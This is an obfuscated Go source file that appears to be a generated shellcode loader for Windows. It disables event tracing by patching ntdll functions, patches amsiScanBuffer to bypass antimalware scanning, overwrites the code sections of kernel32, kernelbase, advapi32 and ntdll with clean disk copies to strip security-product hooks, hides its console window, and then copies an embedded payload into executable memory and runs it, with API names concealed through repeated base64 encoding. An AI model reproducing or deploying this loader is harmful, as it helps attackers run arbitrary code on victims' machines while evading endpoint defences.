package main

	
	

	import (
		"debug/pe"
		"encoding/base64"
		"encoding/hex"
		
		"XLLsDggFvyviut/XLLsDggFvyviut"
		"strconv"
		"fmt"
			"io/ioutil"
		"syscall"
		"unsafe"
		"time"
		


		"golang.org/x/sys/windows"
		"golang.org/x/sys/windows/registry"
		
	)
	


	const (
		otURhOc= 0x1F0FFF
	)
	var _ unsafe.Pointer
	var (
		hQEzctYq uint16
		nTYRmjU uint16
		pGSJcOG int = 4
	)

	
	
	
	
	func wvnmyO() string {
		bsAM, _ := registry.OpenKey(registry.LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", registry.QUERY_VALUE)
		zCqqeH, _, _ :=  bsAM.GetStringValue("CurrentVersion")
		rDreKH, _, err := bsAM.GetIntegerValue("CurrentMajorVersionNumber")
		if err == nil{
			//jFEj, _, _ := bsAM.GetIntegerValue("CurrentMinorVersionNumber")
			zCqqeH = strconv.FormatUint(rDreKH, 10)
		}
		defer bsAM.Close()
		if zCqqeH == "10" {
			hQEzctYq = 0x18
			nTYRmjU = 0x50
		} else if zCqqeH == "6.3" {
			hQEzctYq = 0x17
			nTYRmjU = 0x4f
		} else if zCqqeH == "6.2" {
			hQEzctYq = 0x16
			nTYRmjU = 0x4e
		} else if zCqqeH == "6.1" {
			hQEzctYq = 0x15
			nTYRmjU= 0x4d
		}
		return zCqqeH 

	}

	func cCtkG(kPohMz string,) string {
		var SGEyTg []byte
			SGEyTg, _ = base64.StdEncoding.DecodeString(kPohMz)
		EYQXjBxy := 1
		for i := 1; i < pGSJcOG; i++ {
			SGEyTg, _ = base64.StdEncoding.DecodeString(string(SGEyTg))
			EYQXjBxy += i
		}
		return string(SGEyTg)
	
	}

	

	func axFnUExkGE(show bool) {
		CizuvqUcTGsnT := syscall.NewLazyDLL(string([]byte{'k', 'e', 'r', 'n', 'e', 'l', '3', '2',})).NewProc(cCtkG("VldwS1YwMUdSWGxQV0ZacVRXcHNlbGRzV210alIwcDBWVzVhYTJSNk1Eaz0="))
		HLcbZxxgtfTZIfMqeH := syscall.NewLazyDLL(string([]byte{'u', 's', 'e', 'r', '3', '2',})).NewProc(cCtkG("VmxSS2IyUnRVWGhhU0VKcFlsWktNbHBJWXpsUVVUMDk="))
		nQtVckRCnHHpYVxC, _, _ := CizuvqUcTGsnT.Call()
		if nQtVckRCnHHpYVxC == 0 {
			return
		}
		if show {
		var cueDYMuWRVkqj uintptr = 9
		HLcbZxxgtfTZIfMqeH.Call(nQtVckRCnHHpYVxC, cueDYMuWRVkqj)
		} else {
		var eyMHyDnTsRFFLh uintptr = 0
		HLcbZxxgtfTZIfMqeH.Call(nQtVckRCnHHpYVxC, eyMHyDnTsRFFLh)
		}
	}



	
	const (
		TyFs= 997
	)
	var WqZxGK error = syscall.Errno(TyFs)
	var GnvUoPx = syscall.NewLazyDLL(string([]byte{'k', 'e', 'r', 'n', 'e', 'l', '3', '2',})).NewProc(cCtkG("Vm1wT1MyTkhVa2hXYkVacVlsUnNjVmRzYUU5bGJGSllWbTVTYVUwd2J6RT0="))


	func iEDPyv(Foxuq uintptr, WoClPV uintptr, BcTBXR *byte, llAWiLy uintptr, thlUcVb *uintptr) (err error) {
		r1, _, e1 := syscall.Syscall6(GnvUoPx.Addr(), 5, uintptr(Foxuq), uintptr(WoClPV), uintptr(unsafe.Pointer(BcTBXR)), uintptr(llAWiLy), uintptr(unsafe.Pointer(thlUcVb)), 0)
		if r1 == 0 {
			if e1 != 0 {
				err = JccxXkK(e1)
			} else {
				err = syscall.EINVAL
			}
		}
		return
	}

	func JccxXkK(e syscall.Errno) error {
		switch e {
		case 0:
			return nil
		case TyFs:
			return WqZxGK
		}
	
		return e
	}
	

	
	var YpkIYn = syscall.NewLazyDLL(string([]byte{'n', 't', 'd', 'l', 'l',})).NewProc(cCtkG("Vld4b1UwMHhVblJQVkVKb1ZqRndkMWRVU2tkTlIwWllUMWhXVm1KV1duVlpWbWhQVFVad1dWTlVNRDA9"))
	var niUrGY = syscall.NewLazyDLL(string([]byte{'n', 't', 'd', 'l', 'l',})).NewProc(cCtkG("Vld4b1UwMHhTbGxYYlhocFlteEtWRmRzWkd0alIwMTZWVzE0YWxwNk1Eaz0="))
	var IpesSoQj = syscall.NewLazyDLL(string([]byte{'n', 't', 'd', 'l', 'l',})).NewProc(cCtkG("Vld4b1UwMHhTbGxYYlhocFlteEtXVmt5TVhOTlJuQldWMnBHYVZJell6az0="))
	var FwVTVnO = syscall.NewLazyDLL(string([]byte{'n', 't', 'd', 'l', 'l',})).NewProc(cCtkG("Vld4b1UwMHhTbGxYYlhocFlteEtXVmt5TVhOTlJuQlNVRlF3UFE9PQ=="))

	func QUqXXye() {
		SvlQlo := uintptr(0xffffffffffffffff)
		xqwyZqzh := []uintptr{ YpkIYn.Addr(), niUrGY.Addr(), IpesSoQj.Addr(), FwVTVnO.Addr()}
		for i, _ := range xqwyZqzh {
			kNCx, _ := hex.DecodeString("4833C0C3")
			var JagIE uintptr
			nDvuT := len(kNCx)
			iEDPyv(SvlQlo, xqwyZqzh[i], &kNCx[0], uintptr(uint32(nDvuT)), &JagIE)
		}
	}

	func OAioFYE(SvlQlo windows.Handle) {
		xqwyZqzh := []uintptr{ YpkIYn.Addr(), niUrGY.Addr(), IpesSoQj.Addr(), FwVTVnO.Addr()}
		for i, _ := range xqwyZqzh {
			kNCx, _ := hex.DecodeString("4833C0C3")
			var JagIE uintptr
			nDvuT := len(kNCx)
			iEDPyv(uintptr(SvlQlo), xqwyZqzh[i], &kNCx[0], uintptr(uint32(nDvuT)), &JagIE)
		}
	}



	
	func frfwh() {
		var ODpVTg uint64
		ODpVTg = 0xffffffffffffffff
		EIdWa, _ := windows.LoadLibrary(string([]byte{'a','m','s','i','.','d','l','l'}))
		GCnK, _ := windows.GetProcAddress(EIdWa, string([]byte{'a','m','s','i','S','c','a','n','B','u','f','f','e','r'}))
		BROSVGxn, _ :=  hex.DecodeString("B857000780C3")
		var xmJNbygQ uintptr
		sJexHD := len(BROSVGxn)
		iEDPyv(uintptr(ODpVTg), uintptr(uint(GCnK)), &BROSVGxn[0], uintptr(uint32(sJexHD)), &xmJNbygQ)
	}
	

	var procReadProcessMemory = syscall.NewLazyDLL("kernel32.dll").NewProc("ReadProcessMemory")

	func ObDoHNr() uintptr {
		var funcNtAllocateVirtualMemory = syscall.NewLazyDLL(string([]byte{'n', 't', 'd', 'l', 'l'})).NewProc("NtAllocateVirtualMemory")
		handle := uintptr(0xffffffffffffffff)
		num := 2
		var add uintptr
		AllAddr := funcNtAllocateVirtualMemory.Addr()
		for i := 0; i < 20; i++ {
			rawr, _, _ := ReadProcessMemory(handle, AllAddr+uintptr(i), uintptr(num))
			f := fmt.Sprintf("%0x", rawr)
			if f == "0f05" {
				add = AllAddr + uintptr(i)
				return add
			}
		}
		return add
	}

	func ReadProcessMemory(hProcess uintptr, lpBaseAddress uintptr, nSize uintptr) (lpBuffer []uint8, lpNumberOfBytesRead int, ok bool) {
		var nBytesRead int
		buf := make([]uint8, nSize)
		ret, _, _ := procReadProcessMemory.Call(
			uintptr(hProcess),
			lpBaseAddress,
			uintptr(unsafe.Pointer(&buf[0])),
			nSize,
			uintptr(unsafe.Pointer(&nBytesRead)),
		)
	
		return buf, nBytesRead, ret != 0
	}
	
		

	func main() {
		
		QUqXXye()
		frfwh()
		time.Sleep(2609 * time.Millisecond)
		zCqqeH := wvnmyO()
		
		if zCqqeH == "10" {
			EQilZZTDEqDCkO()
		}
		QUqXXye()
		axFnUExkGE(false)
		opXwdnNjtpuFGcHdYu := XLLsDggFvyviut.ZkwWxHUvCGsWgq()
		MqUfxfePcYWrb(opXwdnNjtpuFGcHdYu)
	}

	
	func MqUfxfePcYWrb(opXwdnNjtpuFGcHdYu []byte){
		var iLBAwAkQGTnixzedK uint64
		var LPBTvKLFimZLAgOdSC, nxaLCMeqAL, fOBsOZCCWFig, oyQjawaMwphz uintptr
		iLBAwAkQGTnixzedK = 0xffffffffffffffff
		EOQbgEXHeYj := len(opXwdnNjtpuFGcHdYu)
		PxvphwfBgsskDKVvcB := uintptr(EOQbgEXHeYj)
		oyQjawaMwphz = 0x40
		fOBsOZCCWFig = 0x3000
		
		YOrSiNedOpLCRkJa := XLLsDggFvyviut.QuxeFGNiDdV(hQEzctYq, iLBAwAkQGTnixzedK, LPBTvKLFimZLAgOdSC, nxaLCMeqAL, PxvphwfBgsskDKVvcB, fOBsOZCCWFig, oyQjawaMwphz, 0)
		zAvzREhDlcmA  := (*[1890000]byte)(unsafe.Pointer(YOrSiNedOpLCRkJa))
		for x, y := range []byte(opXwdnNjtpuFGcHdYu) {
			zAvzREhDlcmA [x] = y
		}
		
		syscall.Syscall(YOrSiNedOpLCRkJa, 0, 0, 0, 0,)
	}	
	

	
	
		func EQilZZTDEqDCkO() error {
			bRkRFnpDygWqqAFiw := []string{string([]byte{'C', ':', '\\', 'W', 'i', 'n', 'd', 'o', 'w', 's', '\\', 'S', 'y', 's', 't', 'e', 'm', '3', '2', '\\', 'k', 'e', 'r', 'n', 'e', 'l', '3', '2', '.', 'd', 'l', 'l'}),
			string([]byte{'C', ':', '\\', 'W', 'i', 'n', 'd', 'o', 'w', 's', '\\', 'S', 'y', 's', 't', 'e', 'm', '3', '2', '\\', 'k', 'e', 'r', 'n', 'e', 'l', 'b', 'a', 's', 'e', '.', 'd', 'l', 'l'}),
			string([]byte{'C', ':', '\\', 'W', 'i', 'n', 'd', 'o', 'w', 's', '\\', 'S', 'y', 's', 't', 'e', 'm', '3', '2', '\\', 'a', 'd', 'v', 'a', 'p', 'i', '3', '2', '.', 'd', 'l', 'l'}),
			string([]byte{'C', ':', '\\', 'W', 'i', 'n', 'd', 'o', 'w', 's', '\\', 'S', 'y', 's', 't', 'e', 'm', '3', '2', '\\', 'n', 't', 'd', 'l', 'l', '.', 'd', 'l', 'l'})}
			
			for i, _ := range bRkRFnpDygWqqAFiw {
				
				eMBrXoDIBDP, yqsBBGQbVEhlvz := ioutil.ReadFile(bRkRFnpDygWqqAFiw[i])
				if yqsBBGQbVEhlvz != nil {
					return yqsBBGQbVEhlvz
				}
				FujdODbqgRGHQ, yqsBBGQbVEhlvz := pe.Open(bRkRFnpDygWqqAFiw[i])
				if yqsBBGQbVEhlvz != nil {
					return yqsBBGQbVEhlvz
				}
				SetFpvUlxNW := FujdODbqgRGHQ.Section(string([]byte{'.', 't', 'e', 'x', 't'}))
				OVjLOnLHPtO := eMBrXoDIBDP[SetFpvUlxNW.Offset:SetFpvUlxNW.Size]
				OejgzgatPliaV, yqsBBGQbVEhlvz := windows.LoadDLL(bRkRFnpDygWqqAFiw[i])
				if yqsBBGQbVEhlvz != nil {
					return yqsBBGQbVEhlvz
				}
				hIOVsYGaKruzet := OejgzgatPliaV.Handle
				KgSCVtlSCN := uintptr(hIOVsYGaKruzet)
				HHGGHldArIaKsY := uint(KgSCVtlSCN) + uint(SetFpvUlxNW.VirtualAddress)
				oZYOcyKFyGmfT := uintptr(len(OVjLOnLHPtO))
				SGwjxHppOJdgDY := uintptr(0xffffffffffffffff)
				var vMuZxrRgNgkLr uintptr
				NnfijvvuiUtVyDL := ObDoHNr()

				TFkvkoTLiyRqKisoy, _ := XLLsDggFvyviut.ZJfATTgsowQKeGE(
					nTYRmjU,
					NnfijvvuiUtVyDL, 
					SGwjxHppOJdgDY,
					(*uintptr)(unsafe.Pointer(&HHGGHldArIaKsY)),
					&oZYOcyKFyGmfT,
					0x40,
					&vMuZxrRgNgkLr,
				)
				if TFkvkoTLiyRqKisoy != 0 {
				}
				for i := 0; i < len(OVjLOnLHPtO); i++ {
					IKhCJdDusnG := uintptr(HHGGHldArIaKsY + uint(i))
					MXdCRLwmcpWdf := (*[1]byte)(unsafe.Pointer(IKhCJdDusnG))
					(*MXdCRLwmcpWdf)[0] = OVjLOnLHPtO[i]
				}
				TFkvkoTLiyRqKisoy, _ = XLLsDggFvyviut.ZJfATTgsowQKeGE(
					nTYRmjU, 
					NnfijvvuiUtVyDL, 
					SGwjxHppOJdgDY,
					(*uintptr)(unsafe.Pointer(&HHGGHldArIaKsY)),
					&oZYOcyKFyGmfT,
					0x20,
					&vMuZxrRgNgkLr,
				)
			}
			return nil
		}